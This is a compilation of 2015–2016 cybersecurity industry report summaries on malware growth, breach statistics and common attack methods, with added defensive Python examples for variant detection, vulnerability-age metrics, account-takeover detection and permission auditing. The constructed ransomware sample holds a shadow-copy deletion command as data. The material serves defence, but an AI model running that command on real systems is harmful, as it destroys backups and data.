On September 22, 2016, Check Point Software Technologies Ltd. published the results of a study that found a 9-fold increase in unknown malware attacking enterprise systems and concluded that companies should deploy a best-in-class security architecture.
The company's experts analyzed data from 31,000 Check Point security gateways around the world and described which known and unknown types of malware and attacks affect corporate IT systems, and what the consequences are of integrating mobile devices into enterprise IT infrastructures. The report also estimates companies' losses from breaches and the cost of remediating them.
The SANS 2016 Threat Landscape Study, conducted with SANS researchers, surveyed more than 300 IT and security professionals worldwide.
The purpose of the survey is to find out:
- what threats organizations face in reality,
- when and how these threats become security incidents,
- what types of threats have the most serious consequences,
- what critical tasks are faced by companies that want to protect themselves.
Both the Check Point Security Report and SANS 2016 Threat Landscape Study provide insights into the landscape of cyber threats - from the network to the end device.
The main conclusions of the study:
- The number of unknown malware variants continues to grow. The researchers found a 9-fold increase in the number of unknown programs attacking organizations. Network intrusions are increasing because employees download unknown malware every 4 seconds. Every month, experts discover almost 12 million new unknown malware variants; more have been found in the past two years than in the entire previous decade.
- Security cannot keep up with fast-moving mobile devices. Smartphones and tablets account for 60% of all time spent on digital media. For business, mobile devices are a headache for access security and a boon for productivity. Although employees do not intend to harm the company's security, one in five of them causes a breach, through mobile malware or an infected Wi-Fi access point.
- End devices are the starting point of most attacks. In the companies studied, user devices are the most common cause of breaches and the most important component of cyber defense; in 75% of cases attackers use email to carry out attacks. 39% of attacks on end devices bypass firewall protection, and routine scans detect 85% of threats only after they have entered the company's network.
Both reports warn that effective security begins with a best-in-class security architecture that can address current and future IT protection challenges. Advanced threat prevention, mobile security and network segmentation are critical components that today's company needs.
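The first finding above, that the number of "unknown" malware variants keeps growing, is largely a consequence of exact-match detection: a sample rebuilt with a changed string has a new hash and is unknown to a hash blocklist even though it is the same family. The following added example (not code from Check Point or SANS) contrasts a SHA-256 blocklist with a simple byte 4-gram Jaccard similarity check on constructed byte strings. The samples, the 0.7 threshold and the use of n-gram Jaccard similarity as a stand-in for fuzzy hashing (ssdeep and the like) are all assumptions made for illustration; none of the byte strings is real malware.

```python
"""Why exact-hash blocklists miss "unknown" variants (added example).
Exact SHA-256 match versus byte 4-gram Jaccard similarity on constructed samples."""
import hashlib


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def byte_ngrams(data, n=4):
    """Set of all n-byte substrings; a crude structural fingerprint of the file."""
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def jaccard(a, b):
    union = a | b
    return len(a & b) / len(union) if union else 1.0


class Blocklist:
    """Exact SHA-256 matches plus one n-gram profile per known sample."""

    def __init__(self, threshold=0.7):   # assumed tuning value, not from the report
        self.threshold = threshold
        self.hashes = set()
        self.profiles = {}

    def add(self, family, data):
        self.hashes.add(sha256_hex(data))
        self.profiles[family] = byte_ngrams(data)

    def hash_hit(self, data):
        return sha256_hex(data) in self.hashes

    def similarity(self, data):
        """Return (closest_family, score) for the sample; score is Jaccard in [0, 1]."""
        grams = byte_ngrams(data)
        best = (None, 0.0)
        for family, profile in self.profiles.items():
            score = jaccard(grams, profile)
            if score > best[1]:
                best = (family, score)
        return best

    def similarity_hit(self, data):
        family, score = self.similarity(data)
        return family if score >= self.threshold else None


# Constructed stand-ins: a PE-like stub plus strings typical of ransomware.
KNOWN_SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"This program cannot be run in DOS mode.\r\n"
    b"vssadmin delete shadows /all /quiet\x00"
    b"Your files have been encrypted. Visit the payment page.\x00"
    b"http://payment.example.invalid/id=1001\x00"
)
# The same code rebuilt with a new campaign ID and some padding: new hash, same behaviour.
VARIANT_SAMPLE = KNOWN_SAMPLE.replace(b"id=1001", b"id=7734") + b"\x90" * 12
# An unrelated program that shares only the DOS stub boilerplate with the known sample.
BENIGN_SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"This program cannot be run in DOS mode.\r\n"
    b"Hello, world! Calculator v1.2\x00"
)


def analyze():
    """Run both detection methods over the constructed samples and report the outcome."""
    bl = Blocklist()
    bl.add("locky-like", KNOWN_SAMPLE)
    return {
        "hash_hit_known": bl.hash_hit(KNOWN_SAMPLE),
        "hash_hit_variant": bl.hash_hit(VARIANT_SAMPLE),        # False: one changed string, new hash
        "sim_variant": round(bl.similarity(VARIANT_SAMPLE)[1], 3),
        "sim_benign": round(bl.similarity(BENIGN_SAMPLE)[1], 3),
        "similarity_hit_variant": bl.similarity_hit(VARIANT_SAMPLE),
        "similarity_hit_benign": bl.similarity_hit(BENIGN_SAMPLE),
    }


if __name__ == "__main__":
    for key, value in analyze().items():
        print("%-24s %s" % (key, value))
```

The benign sample deliberately shares the DOS stub with the known one, which is why its score is not zero: real fuzzy-hash deployments strip or down-weight such common boilerplate before comparing, otherwise every Windows executable looks a little like every other.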
Cybercriminals set their sights on extractive industry
On August 11, 2016, Trend Micro Incorporated published the report Cyber Threats to the Mining Industry, which concluded that cybercriminals are taking a growing interest in the extractive industry.
Previously, the main targets of cybercriminals were banks and financial and medical institutions; now they have turned their attention to extractive industry enterprises. The problem of cyber attacks in this industry is closely tied to the growing automation of its processes: manual labor and simple mechanisms have been replaced by devices controlled centrally through specialized software.
Such enterprises use operational technology (OT), hardware and software that records and controls changes in the production process. At the same time, in many organizations OT is at best poorly protected against cyber attacks. The growing penetration of cloud computing, business intelligence systems and the Internet of Things into the industry is leading to the convergence of IT and OT, which gives attackers broad access to system components and critical processes.
Most industrial control systems (ICS) in use in 2016 were developed decades ago. Faced with new requirements to connect to the corporate network and support remote access, ICS developers usually adapt existing IT solutions to simplify integration and reduce development costs. However, this introduces a number of new vulnerabilities.
Examples of large cyber attacks in the extractive industry:
In April and May 2015, the Canadian gold mining company Detour Gold Corp. was attacked by a hacker group that called itself Angels_Of_Truth. As a result, attackers stole more than 100 GB of valuable information. At the same time, 18 GB of this data was placed on the torrent tracker.
In February 2016, the New South Wales (NSW) Department of Industry, Resources and Energy was also attacked by hackers. The attackers unsuccessfully tried to gain access to confidential information about mining permits.
In April 2016, the Canadian gold miner Goldcorp suffered a major data breach. The attackers released 14.8 GB of data by posting a document on Pastebin, a popular site for storing and sharing text, with a link to download it. The archive contained employees' personal data and financial information.
Cyber attacks on industry are carried out mainly to obtain technical knowledge that gives a competitive advantage, to weaken another state's economy, to obtain specific data (personally identifiable information (PII), financial data or accounts), or even to protest against mining companies as a source of environmental pollution.
Cyber attacks can have a serious impact on a company's business, for example by worsening financial performance, stealing intellectual property or eroding competitive advantage. All of this becomes possible because cybercriminals are able to reach the information they need. In the extractive industry, attackers are interested first of all in:
- data on the pricing of metals and minerals;
- intellectual property, such as the method of production, processing of raw materials, chemical formulas, software, etc.;
- information on public policy, decisions and decision-making processes of corporate executives;
- data on new potential fields;
- information on ore reserves and production process;
- data from mine monitoring systems that are used for real-time production control, safety and environmental monitoring.
Cyber attacks in the extractive industry can not only cause losses due to production downtime, but have a negative impact on the value of the company's shares, damage the economy of a country or region, if it depends on such an enterprise.
The most commonly used methods of committing cyber attacks today are:
- phishing and social engineering;
- exploitation of vulnerabilities;
- infection of the site that employees of the enterprise visit most often;
- misconfiguration of the operating system;
- drive-by downloads;
- malicious advertising (malvertising);
- compromise of third-party vendors;
- man-in-the-middle (MitM) attacks;
- compromised hardware;
- insiders.
In its report, the company concludes that most extractive industry businesses do not recognize the importance of protecting against cyber attacks, while vulnerabilities that attackers can exploit are constantly being discovered.
Large mining companies whose activities directly affect the economy of individual regions or countries should pay particular attention to cybersecurity. First of all, they need to implement advanced protection at all levels of enterprise management.
Cisco: Ransomware Is Coming
On July 28, 2016, Cisco published its information security report for the first half of 2016, pointing to the high likelihood of a next generation of ransomware. In light of this, the company sees closing attackers' "window of opportunity" as the main task for organizations in protecting their data.
According to Cisco's Midyear Cybersecurity Report, organizations are not ready for the emergence of sophisticated ransomware varieties, and among the main reasons cybercriminals' activity stays hidden are:
- unstable infrastructure,
- poor network hygiene,
- low detection rate.
Cisco 2016 Midyear Cybersecurity Report: Executive Perspectives, (2016)
The study's results lead to the conclusion that companies' main difficulty lies in limiting attackers' operational space, which jeopardizes the entire foundation needed for digital transformation. Attackers have broadened their activity by attacking servers, the sophistication of attacks has grown, and the use of encryption to disguise malicious activity has become more frequent.
In the first half of 2016, ransomware became the most profitable type of malware in history, Cisco's experts say. They expect the trend to continue: ransomware will gain even more destructive functionality, including the ability to spread on its own, and whole networks and companies may be taken "hostage".
Modular varieties of such programs will quickly change tactics to achieve maximum efficiency. For example, future ransomware will be able to avoid detection by minimizing CPU usage and doing without command-and-control traffic. Such versions will spread faster than their predecessors and self-replicate within organizations before the attack begins.
One of the main problems of companies and networks has been, and remains, poor visibility into the network and its endpoints. On average, organizations take up to 200 days to identify new threats. Reducing time to detection is essential for limiting attackers' operational space and minimizing the damage from intrusions.
Unsupported and unpatched systems give attackers additional convenience, letting them gain access, go unnoticed, increase their income and inflict maximum damage. The Cisco MCR 2016 report indicates that the problem is global. For several months, attacks have been growing in the most important industries (for example, healthcare), and all vertical markets and world regions have become targets. Public organizations and enterprises, charities and non-governmental organizations, e-commerce companies: all of them recorded an increase in the number of attacks in the first half of 2016.
Attackers do not limit themselves
The size of the attackers' profits is directly proportional to how long they can act covertly. According to Cisco, in the first half of 2016, attackers' income grew due to a number of factors:
- Expanding the scope of action. Attackers broaden their scope, moving from client-side exploits to server-side exploits, evading detection and maximizing damage to enterprises and their revenues.
- Adobe Flash vulnerabilities remain one of the main targets of malvertising and exploit kits. In the widespread Nuclear exploit kit, Flash accounts for 80% of successful compromise attempts.
- Cisco also noted a trend of ransomware exploiting server vulnerabilities, especially in JBoss servers (10% of Internet-connected JBoss servers are compromised). Many of the JBoss vulnerabilities used to compromise systems were identified five years ago, and basic patching with vendor updates could have prevented these attacks.
- New attack methods. In the first half of 2016, cybercriminals developed methods that exploit the lack of network visibility.
- Windows binary exploits became the top web attack method over the past six months. This method gives attackers a strong foothold in network infrastructures and makes attacks harder to detect and remediate.
- Facebook social-engineering scams moved from first place (2015) to second.
- Covering tracks. In addition to exploiting visibility gaps, attackers began to use encryption more often to mask various aspects of their activity.
- Cisco recorded increased use of cryptocurrencies, Transport Layer Security (TLS) and the Tor browser (The Onion Router), which allows anonymous communication on the Internet.
- Malvertising campaigns showed a 300% increase in the use of HTTPS-encrypted malware between December 2015 and March 2016. Such software allows attackers to hide their web activity for a long time, prolonging their illegal operations.
Security actions in attempts to reduce vulnerabilities and close gaps
Faced with sophisticated attacks, companies with limited resources and aging infrastructure have a hard time keeping up with their adversaries. The data suggests that the more important a technology is to business operations, the worse its network hygiene, including patching. For example:
- for browsers, 75-80% of users run the latest or penultimate version of Google Chrome, which supports automatic updates;
- Java is updated much more slowly: one third of the systems studied had Java SE 6 installed, which Oracle has long since retired (Java SE 8 was the current release at the time);
- no more than 10% of Microsoft Office 2013 (version 15.x) users had installed the latest service pack.
The Cisco study also revealed that much of the infrastructure of potential victims is either unsupported or is operated with known vulnerabilities. This is a systemic problem for both vendors and endpoints. Examining more than 103,000 Internet-connected devices, Cisco found:
- each device had an average of 28 known vulnerabilities;
- known vulnerabilities on the devices had been present for an average of 5.64 years;
- more than 9% of known vulnerabilities were over 10 years old.
For comparison, Cisco specialists examined more than 3 million software installations, mainly Apache and OpenSSH. They found an average of 16 known vulnerabilities with an average age of 5.05 years.
Updating a browser on a user's device is simple; enterprise applications and server infrastructure are harder, since updating them can interrupt business processes. The study's conclusion: the more important an application's role in a company's business operations, the less likely it is to be updated regularly, which leaves security holes and openings for subsequent attacks.
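To turn the report's three fleet metrics (known vulnerabilities per device, their average age, and the share older than ten years) into something you can run against your own inventory, here is an added Python example. It is not Cisco's code or data: the inventory, the finding identifiers and the dates are constructed, and a year is approximated as 365.25 days. A finding whose patch date is before the reference date is treated as closed, so the exposure window is counted only while the flaw is actually present.

```python
"""Fleet 'known vulnerability age' metrics in the style of the Cisco report.
Added example: the inventory is constructed and the FLAW-* identifiers are
placeholders, not real advisories."""
from datetime import date
from statistics import mean

# Constructed inventory: device -> list of (finding id, public disclosure date,
# date it was patched on this device or None if still open).
INVENTORY = {
    "edge-router-01": [
        ("FLAW-A", date(2011, 3, 1), None),
        ("FLAW-B", date(2014, 6, 15), None),
    ],
    "web-proxy-02": [
        ("FLAW-C", date(2005, 1, 10), None),            # older than 10 years
        ("FLAW-D", date(2015, 2, 2), date(2015, 3, 1)),  # patched: window closed
    ],
    "vpn-gw-03": [],                                    # clean device
}

REFERENCE_DATE = date(2016, 7, 1)  # "as of" date for the age calculation


def open_findings(inventory, as_of):
    """Yield (device, finding id, age in years) for each finding still open on as_of."""
    for device, findings in inventory.items():
        for fid, disclosed, patched in findings:
            if patched is not None and patched <= as_of:
                continue  # exposure window closed before the reference date
            yield device, fid, (as_of - disclosed).days / 365.25


def fleet_metrics(inventory, as_of, old_threshold_years=10):
    """Return the three numbers the report quotes: open vulnerabilities per device,
    mean age of open vulnerabilities in years, and share older than the threshold."""
    ages = [age for _, _, age in open_findings(inventory, as_of)]
    if not ages:
        return {"per_device": 0.0, "mean_age_years": 0.0, "share_over_threshold": 0.0}
    return {
        "per_device": len(ages) / len(inventory),
        "mean_age_years": round(mean(ages), 2),
        "share_over_threshold": sum(a > old_threshold_years for a in ages) / len(ages),
    }


if __name__ == "__main__":
    for device, fid, age in open_findings(INVENTORY, REFERENCE_DATE):
        print(f"{device}: {fid} open for {age:.1f} years")
    print(fleet_metrics(INVENTORY, REFERENCE_DATE))
```

With a real inventory, the per-device count matters less than the age distribution: a handful of decade-old findings on network gear is exactly the pattern the report describes, and the list printed by `open_findings` is the patching backlog, oldest first once sorted.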
Prices for hacking social media accounts and mail services
Server hacking, theft of funds from bank cards, leaks of personal data: these and many other "services" now have a price tag. Dell SecureWorks, which specializes in assessing and analyzing the security of computer systems, published a price list for hacker services around the world in the summer of 2016. Market participants see this as one of the signs of how prosperous cybercrime has become.
According to the experts, access to an American social network account costs about $129, and access to a Russian Odnoklassniki or VKontakte account $194. Hacking a Gmail, Hotmail or Yahoo account costs an average of $129. And for just 40-60 thousand rubles, one can "order" any information about a domestic competitor: bank account details, tax identification numbers (INN), founding documents, and information on employees and their phone numbers.
News of personal data theft or illegal withdrawals from bank cards appears in the press with enviable regularity. For example, in May the personal data of 117 million LinkedIn users were put up for sale on the dark web; according to analysts, the hacker using the pseudonym "Peace" could earn about $2.5 thousand from the sale. And just the other day, a woman from the Nizhny Novgorod region transferred 85 thousand rubles to an attacker, believing she was talking to a bank employee.
Balabit: top 10 most popular hacker methods
1. Social engineering (e.g. phishing)
Most hackers aim to become insiders and then escalate the privileges of a stolen account. Finding an existing privileged account and cracking its password is not a fast process, and it leaves many traces (for example, the extra log entries generated by automated attack attempts) that greatly raise the risk of the suspicious activity being noticed. That is why hackers prefer social engineering techniques that persuade users to hand over their login and password voluntarily.
"The recent theft of data on more than 10,000 employees of the Department of Justice and the Department of Homeland Security, and the compromise of more than 20,000 accounts of Federal Bureau of Investigation (FBI) employees, prove once again that today it is much easier for hackers to become 'one of their own' inside a system using social engineering tactics than to write zero-day exploits," says Zoltán Györkő, CEO of Balabit. Traditional access control tools and antivirus solutions are certainly necessary, but they only protect a company's critical assets while the hackers are outside the network. Once they have penetrated the system even once, even through low-level access, they can easily escalate privileges and obtain privileged administrative access to the corporate network. The bigger challenge is finding the hacker inside the network once he has become one of the privileged users.
"Hijacked accounts (legitimate logins and passwords used for criminal purposes) can be detected by noticing changes in user behavior, for example in the time and place of login, typing speed, the commands used, or signs that the account is being driven by scripts. User behavior analytics tools, which build baseline profiles of real employees' actions, can easily detect anomalies in account use and either warn security staff or block the user until the circumstances are clarified," adds Zoltán Györkő.
2. Compromised accounts (e.g. weak passwords)
Compromised accounts, especially those protected by weak passwords, are dangerous because users tend to choose simple, easy-to-remember passwords and often reuse the same ones for corporate and personal accounts. If a hacker obtains a user's login and password from a less secure system (for example, a personal social network account), he can use them to log into the company's network.
3. Web attacks (for example, SQL injection)
Exploiting security holes in online applications (such as SQL injection) remains a very popular hacking method, mainly because applications are a critical interface through which large numbers of internal and external users reach company assets, which makes them an attractive target. Unfortunately, the quality of application code still raises security questions. There are many automated scanners attackers can use to find vulnerable applications. Other hacking methods can bring the same result but are harder or slower to use; writing an exploit, for example, takes longer and requires good programming skills.
The remaining places among the most popular hacker methods were distributed as follows:
4. Client-side attacks (document viewers, browsers)
5. Exploits for popular server software (for example, the OpenSSL Heartbleed vulnerability)
6. Unmanaged personal devices (for example, when the enterprise has no BYOD policy)
7. Physical intrusion
8. Shadow IT (for example, users relying on personal cloud services for business purposes)
9. Use of third-party service providers (e.g. infrastructure outsourcing)
10. Theft of data uploaded to the cloud (e.g. IaaS, PaaS)
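As an added example of the behavioural detection Balabit's CEO describes under method 1 (not Balabit's product or code), the following Python builds a per-user baseline from constructed login records and scores fresh events against it. The log format (user, login hour, source country, mean keystroke interval in milliseconds, command), the 3-sigma typing-speed rule and the alert threshold of two deviations are assumptions chosen for illustration.

```python
"""Behavioural baseline for hijacked-account detection. Added example with
constructed log lines; field layout, thresholds and scoring are assumptions."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed history of legitimate activity: "user,hour,country,keystroke_ms,command"
HISTORY = """\
alice,09,DE,180,ls
alice,10,DE,175,git
alice,11,DE,190,ssh
alice,14,DE,185,ls
alice,16,DE,170,git
alice,09,DE,182,ls
""".splitlines()


def parse(line):
    user, hour, country, ms, cmd = line.strip().split(",")
    return {"user": user, "hour": int(hour), "country": country,
            "keystroke_ms": float(ms), "command": cmd}


def build_baselines(lines):
    """Per user: login hours, source countries and commands seen, plus the
    keystroke-interval mean/stddev. Needs several events per user to mean much."""
    per_user = defaultdict(list)
    for ev in map(parse, lines):
        per_user[ev["user"]].append(ev)
    baselines = {}
    for user, evs in per_user.items():
        ks = [e["keystroke_ms"] for e in evs]
        baselines[user] = {
            "hours": {e["hour"] for e in evs},
            "countries": {e["country"] for e in evs},
            "commands": {e["command"] for e in evs},
            "ks_mean": mean(ks),
            "ks_sd": pstdev(ks) or 1.0,  # guard against a perfectly flat profile
        }
    return baselines


def score_event(baseline, ev):
    """Return (score, reasons): one point per deviation from the profile.
    An account with no baseline at all gets the maximum score."""
    if baseline is None:
        return 4, ["no baseline for user"]
    reasons = []
    if ev["hour"] not in baseline["hours"]:
        reasons.append("unusual login hour")
    if ev["country"] not in baseline["countries"]:
        reasons.append("new source country")
    if ev["command"] not in baseline["commands"]:
        reasons.append("command never used by this account")
    z = abs(ev["keystroke_ms"] - baseline["ks_mean"]) / baseline["ks_sd"]
    if z > 3:
        reasons.append("keystroke timing far from profile (script or different person)")
    return len(reasons), reasons


def triage(lines, threshold=2):
    """Score fresh events against the HISTORY baselines.
    Returns (user, score, alert, reasons) per event; alert when score >= threshold."""
    baselines = build_baselines(HISTORY)
    results = []
    for ev in map(parse, lines):
        score, reasons = score_event(baselines.get(ev["user"]), ev)
        results.append((ev["user"], score, score >= threshold, reasons))
    return results


if __name__ == "__main__":
    # Constructed fresh events: one normal, one that looks like a takeover.
    for row in triage(["alice,10,DE,178,git", "alice,03,RU,20,useradd"]):
        print(row)
```

The second event trips every rule at once (3 a.m. login, new country, a 20 ms keystroke interval that only a script produces, and `useradd`, which this account has never run); in practice the alert path would lock the session, as the quote describes, rather than just print.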
2015
Gemalto: Breach Level Index 2015
In February 2016, Gemalto published the results of its Breach Level Index analysis [46], according to which 1,673 incidents occurred worldwide in 2015, leading to the compromise of 707 million data records.
Since 2013, when the company began compiling a comparative database of publicly reported breaches, a total of more than 3.6 billion data records have been compromised worldwide, according to the Breach Level Index. By source, the largest number of incidents in 2015 came from attacks by malicious outsiders: 964 such incidents were recorded, or 58% of all incidents and 38% of all compromised data records. By type of compromised data, identity theft remained the most common: 53% of all incidents and 40% of all compromised data records.
By industry, breaches in the public sector accounted for 43% of all compromised data records, up 476% from 2014 (due to several very large breaches in the US and Turkey), but only 16% of the total number of breaches. The healthcare sector accounted for 19% of compromised records and 23% of all breaches. The number of compromised records in retail fell sharply compared with the previous year (by 93%): in 2015, retail accounted for only 6% of all stolen records and 10% of all recorded breaches. In financial services, the number of compromised records fell by almost 99%, to just 0.1% of all compromised records, while the sector accounted for 15% of all breaches.
Although most breaches were the work of malicious outsiders (58%), accidental loss accounted for as much as 36% of all compromised records. State-sponsored attacks made up only 2% of all breaches, but the records stolen in them amounted to 15% of all compromised records. Attacks by malicious insiders accounted for 14% of all breaches and only 7% of compromised records.
In terms of geography, 77% of all data breaches occurred in North America, with 59% of all compromised records occurring in the US. The number of leaks committed in Europe accounted for 12% of the total number of incidents, and the Asia-Pacific region accounted for only 8% of the total number of leaks.
Full analysis of data breaches, including by industry, source, type and geography, is available in the 2015 Breach Level Index Report.
Gemalto: only encryption will help protect against data loss
In the first half of 2015, the number of data breaches rose by 10% compared with the first half of 2014, while the number of compromised data records fell by 41%. The decline in compromised records is explained by fewer recorded large-scale breaches in the retail industry than in the same period a year earlier.
Despite the decrease in the total number of compromised records, large volumes of personal information and credentials are still stolen in large breaches. The largest breach of the first half of 2015 was the identity theft attack on Anthem Insurance customers. That attack, which scored the maximum 10 on the Breach Level Index severity scale, compromised 78.8 million records, almost one third (32%) of all records stolen in the first half of 2015. Other major incidents in the reporting period included the leak of 21 million records from the U.S. Office of Personnel Management (BLI score 9.7); the leak of 50 million records from Turkey's General Directorate of Population and Citizenship Affairs (BLI score 9.3); and the leak of 20 million accounts from the Russian service Topface (BLI score 9.2). In fact, the top 10 breaches accounted for 81.4% of all compromised data records.
Data breaches by source
State-sponsored attacks accounted for only 2% of all incidents, but the records compromised in them amounted to 41% of all stolen data, owing to the scale of the Anthem Insurance and U.S. Office of Personnel Management incidents. Whereas none of the top ten incidents of the first half of 2014 were state-sponsored, this year three of the top ten breaches, including the top two, were.
At the same time, the most common source of breaches in the first half of 2015 was malicious outsiders: 546 breaches, or 62% of the total, compared with 465 (58%) in the first half of the previous year. Outside attackers compromised 56% of records, or 116 million, whereas in 2014 the figures were higher: 71.8%, or 298 million records.
Data breaches by type
Identity theft remained the main type of breach, accounting for 75% of all compromised records and slightly more than half (53%) of all breaches recorded in 2015. Five of the ten largest breaches, including the three largest, which Gemalto's index rated as catastrophic, were identity thefts. By comparison, in the same period of the previous year, theft of personal and identity data accounted for seven of the ten largest incidents.
Industry-specific data breaches
By industry, breaches in government and healthcare together accounted for roughly two thirds of all compromised records (31% and 34%, respectively), even though healthcare accounted for only 21% of all breaches this year, down from 29% a year earlier. Retail saw a sharp fall in stolen records, to just 4% of all compromised data (from 38% a year earlier). By region, more than three quarters of breaches (76%) occurred in the United States, which accounted for about half (49%) of all compromised data. Turkey accounted for 26% of all compromised data, mainly because of the large-scale GDPCA breach in which 50 million records were compromised through malicious actions by outsiders.
The share of incidents in which the exposed data was encrypted (which radically limits the damage from a breach) rose slightly, to 4% of all incidents (from 1% in the first half of 2014).
According to Forrester, attackers use ever more advanced and complex attack techniques, which has noticeably reduced the effectiveness of traditional perimeter security. The constantly changing and evolving threats demand new security measures, one of which is the widespread use of data encryption. In the future, organizations will encrypt data automatically, both in transit across the network and at rest on storage media. A data-centric approach to security is far more effective at countering hackers: by encrypting sensitive data, organizations make it useless to attackers, so attacks on corporate networks become unprofitable and hackers move on to less protected targets. Encryption is becoming a strategic foundation for the security and risk managers responsible for data protection and privacy in their organizations.
Trend Micro Security Predictions
Key forecasts for 2015 from 'Trend Micro Security Predictions for 2015 and Beyond: The Invisible Becomes Visible':
- More and more cybercriminals will turn to underground networks and closed forums to exchange and sell crimeware;
- Growing attacker activity will lead to the emergence of more sophisticated hacking tools;
- Mobile vulnerabilities will play a growing role in infecting devices; exploit kits targeting Android will become widespread;
- Targeted attacks will become the most common type of cybercrime;
- New mobile payment methods will bring new threats;
- There will be new attempts to exploit vulnerabilities in open source applications;
- The diversity of technologies still shields Internet of Everything devices from mass attacks, but the same cannot be said of the data they process;
- New, even more dangerous threats to online banking and other financial services will appear.
Targeted Attack Predictions
According to the report, after cybercriminals achieved notable results in the United States, the number of new targeted attacks will grow in 2015. The experts expect hackers in Vietnam, the UK and India to keep using targeted attacks, and attacks will also appear in countries where they have not been seen before, as has happened in Malaysia and Indonesia.
Financial Services Threat Forecasts
A significant increase in the threat level awaits the banking sector: the number of unique cyber attacks targeting banks and other financial institutions is predicted to grow. In this regard, financial institutions will have to implement two-factor authentication for their online services.
Threat Forecasts for the "Internet of Everything"
The Trend Micro Security Predictions for 2015 report also predicts increasing exploitation of vulnerabilities in smart devices such as cameras, home automation systems and TVs, as cybercriminals attack these platforms, and the organizations that manage their data, ever more aggressively.
Factors such as market pressure push device manufacturers to produce ever more smart systems, but in the race to meet demand they do not always take time to anticipate security issues. As a result, cybercriminals will increasingly find vulnerabilities and exploit them for their own purposes.
HP Cyber Risk Report
On February 24, 2015, HP published its Cyber Risk Report 2015, containing the results of an analysis of the most pressing problems businesses faced in 2014. [47]
HP Security Research staff studied the common vulnerabilities that endanger organizations. According to the study, the main causes of cybersecurity problems in 2014 were "old," well-known vulnerabilities and misconfigurations.
"Cyber defense technologies are constantly improving, but we must not lose sight of old vulnerabilities," says Art Gilliland, senior vice president and general manager of Enterprise Security Products at HP. "We found that the most serious security risks are related to vulnerabilities we have known about for a long time. We cannot move forward while forgetting these problems."
Main results of the study
- 44% of known security incidents involved vulnerabilities that were 2-4 years old. Attackers continue to use "old" methods to hack systems and penetrate networks. The biggest attacks of 2014 exploited vulnerabilities in code written years or even decades ago.
- Server misconfiguration is the number one problem. According to the study, the main misconfiguration is granting overly broad access rights to files and folders. The information attackers obtain this way is then used to mount further attacks.
- In 2014, cybercriminals actively used new attack channels, such as physical devices connected to the network as part of the Internet of Things. Malware for mobile devices also increased. The expanding computing ecosystem plays into attackers' hands, since it creates ever more "entry points" into systems.
- The main causes of software vulnerabilities are defects in the code, including logic errors. Most vulnerabilities stem from a small number of common coding mistakes. Cybercriminals quickly "master" both old and new software vulnerabilities.
What needs to be done to keep yourself safe?
- Implement a comprehensive patching strategy. Keeping systems up to date significantly reduces the likelihood of a successful attack.
- Regular penetration testing and configuration review (in-house or with the help of outside organizations) will reveal configuration errors before hackers exploit them.
- Before introducing new technologies, analyze how they will affect the overall security level.
- Effective threat intelligence sharing helps you understand attacker tactics, take preventive action, and improve security tooling to strengthen security overall.
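For the number-one misconfiguration HP names (overly broad access rights on files and directories), here is an added Python audit, not HP's tooling, that walks a directory tree and reports world-writable files, world-writable directories lacking the sticky bit, and setuid/setgid files. The sample tree is created in a temporary directory so the script runs stand-alone; it is POSIX-only, and treating a sticky world-writable directory as acceptable is a judgement call for the example, not a standard.

```python
"""Permission audit for a directory tree: the 'too wide access rights' case.
Added example; the sample tree is constructed here, not taken from the report."""
import os
import stat
import tempfile


def audit_tree(root):
    """Return [(path, finding)] for entries below root with overly broad modes.
    The root directory itself is not judged, only its contents."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable: skip rather than abort the scan
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                continue  # the link's target is judged on its own when reached
            if stat.S_ISDIR(mode):
                # World-writable directory: anyone can add, rename or delete entries
                # unless the sticky bit restricts deletion to the owner.
                if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                    findings.append((path, "world-writable directory without sticky bit"))
            else:
                if mode & stat.S_IWOTH:
                    findings.append((path, "world-writable file"))
                if mode & (stat.S_ISUID | stat.S_ISGID):
                    findings.append((path, "setuid/setgid file"))
    return findings


def build_sample_tree():
    """Create a constructed tree with one acceptable and three bad entries; return its root."""
    root = tempfile.mkdtemp(prefix="permaudit-")
    os.makedirs(os.path.join(root, "uploads"))
    os.chmod(os.path.join(root, "uploads"), 0o777)      # bad: no sticky bit
    os.makedirs(os.path.join(root, "tmp"))
    os.chmod(os.path.join(root, "tmp"), 0o1777)         # acceptable: sticky, like /tmp
    conf = os.path.join(root, "app.conf")
    with open(conf, "w") as f:
        f.write("db_password=constructed\n")             # constructed secret
    os.chmod(conf, 0o666)                               # bad: anyone can edit config
    helper = os.path.join(root, "helper")
    with open(helper, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(helper, 0o4755)                            # bad: setuid executable
    return root


def kinds(findings):
    """Sorted finding labels, handy for summaries and tests."""
    return sorted(what for _, what in findings)


if __name__ == "__main__":
    for path, what in audit_tree(build_sample_tree()):
        print(f"{what}: {path}")
```

Point `audit_tree` at a web root or application directory on a real host; a world-writable configuration file is exactly the case where an attacker's low-level foothold turns into persistence, since the process that reads the file will trust whatever was written into it.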
CyberEdge Group Cyberthreat Defense Report: More than half of companies fear successful cyber attacks against them in 2015
On August 10, 2015, the results of the CyberEdge Group's annual Cyberthreat Defense Report were published, describing how IT security professionals assess cyber threats and how they combat them.
More than 800 IT security managers and practitioners from 19 different industries took part in the survey.
Threat Response Report, 2015
Some of the statistics:
- more than half (52%) of respondents expect their companies to be victims of successful cyber attacks in 2015; in 2014, 39% of survey participants said so.
- respondents name attacks on web applications as the key cyber threat. Web applications are ubiquitous in modern companies and are often the focus of cybercriminals, for many reasons, not least that they give direct access to confidential data.
- experts are concerned about the security of mobile devices. When assessing their companies' ability to defend various areas of IT against cyber threats, respondents gave mobile devices the lowest ratings.
Level of concern by type of cyber attack, 2015
Laptops and social media applications come next in the ranking. More than two thirds of the organizations surveyed want to replace or upgrade their existing endpoint security tools. Respondents noted that adoption of bring-your-own-device (BYOD) practices will almost double during the year, from 30% to 59%, which points to the need for additional investment in mobile security.
According to the survey participants, SDN technology can have a positive impact on defense against cyber attacks; 63% of respondents share this view. Asked how SDN affects a company's ability to combat cyber threats, respondents who consider the technology useful outnumber those who do not share their colleagues' confidence by about 10 to 1.
IT Security 2015
